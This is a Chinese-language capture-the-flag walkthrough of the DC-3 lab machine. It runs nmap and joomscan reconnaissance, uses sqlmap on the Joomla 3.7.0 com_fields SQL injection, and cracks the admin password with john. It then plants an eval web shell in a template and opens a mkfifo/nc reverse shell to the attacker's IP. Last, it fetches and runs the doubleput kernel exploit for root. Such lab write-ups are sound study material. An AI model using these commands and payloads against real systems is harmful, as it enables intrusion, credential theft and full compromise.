靶机链接:https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg
提取码:0na8
首先查看本机kali的ip地址:192.168.159.145
ifconfig
利用nmap扫描靶机IP
nmap -sP 192.168.159.1/24
查看靶机mac地址
打开虚拟机设置,点击网络适配器——高级
根据靶机的mac地址匹配nmap的扫描结果确认靶机IP为192.168.159.141
使用nmap进行完整扫描
nmap -A 192.168.159.141 -p 1-65535 发现80端口开放,尝试使用浏览器进行访问
使用指纹识别
whatweb http://192.168.159.141/
结果显示靶机使用Apache平台,服务器为Ubuntu
使用joomscan进行扫描
joomscan --url http://192.168.159.141/
结果显示扫描出了网站后台,使用浏览器访问
http://192.168.159.141/administrator/
网站后台为joomla 3.7.0模板
查找模板漏洞
searchsploit joomla 3.7.0
将结果拷贝至当前目录并查看
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomalv370_sqli.txt
cat joomalv370_sqli.txt
发现注入点
使用sqlmap列出数据库库名
sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
列出joomladb的所有表名
sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” --tables -p list[fullordering]
发现#_users表
列出users表的字段类型
sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]
列出账号密码
使用john工具破解密码
vim joom.txt
john joom.txt
结果显示密码为snoopy
进入后台发现
他告诉我们这次DC-3实战只有一个目标获得root权限
在这个目录下有一个beez3 的模板
进去之后我们发现有new file可以编辑文件,考虑上传木马
要上传木马,我们先要找到当前文件所在的目录
目录为http://192.168.159.141/templates/beez3/html/
回到刚才的页面点击new file
在html下创建一个php文件
编辑文件
这里一句话木马写错了,应该是@eval($_REQUEST[‘123’])
尝试访问这个文件,执行成功
使用蚁剑连接
右键连接打开虚拟终端
使用命令查看基本信息
反弹shell,kali本地监听
nc -lvvp 2333
蚁剑虚拟终端
nc -e /bin/bash 192.168.159.145 2333
-e参数不可用
执行命令
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.145 2333 >/tmp/f
可以知道当前靶机系统为Ubuntu 16.04
searchsploit ubuntu 16.04
复制文件
cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt
由于电脑无法访问国外网站,使用网盘下载exp
EXP资源
链接:https://pan.baidu.com/s/1AeuJrP-T6elka5aZP9KL9g
提取码:0fkw
注意此处不要解压压缩包
开启kali的apache2服务:service apache2 start
将文件复制到网页目录下:cp -r 39772 /var/www/html
在靶机执行命令 wget http://192.168.159.145/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput